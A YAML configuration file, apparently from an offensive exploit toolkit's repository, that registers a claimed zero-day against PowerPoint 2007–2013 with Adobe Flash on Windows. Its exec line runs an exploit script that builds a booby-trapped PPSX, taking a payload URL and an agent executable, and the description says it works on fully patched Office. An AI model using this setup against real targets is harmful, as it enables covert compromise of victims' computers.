hackedteam/vector-exploit

View on GitHub
ht-2013-003-Powerpoint/info-good.yaml

Summary

Maintainability
Test Coverage
version: 20140930
id: HT-2013-003
name: Microsoft PowerPoint 2007/2010/2013 + Adobe Flash
category: :zeroday
format:
- ppsx
platform: windows
multiserver: true
exploit_server: true
exec: python exploit.py payload:http %URL% "%OUTPUT%" "%FILE%" "%FILENAME%" %AGENT% %OUTPUT_SERVER% %SCOUT_NAME%.exe
params:
  file: Document
  string: URL
description: "<br><b>Output:</b> PPSX file<br><br><b>Note:</b> The target must be connected to the internet when opening the document. <br><br><b>Platform:</b> Windows<br><br><b>Tested on:</b><br>Windows XP/Vista/7<br>Microsoft Office 2007/2010/2013 (full patched) - <b>Require Adobe Flash v11.1.102.55 or above for Internet Explorer</b>"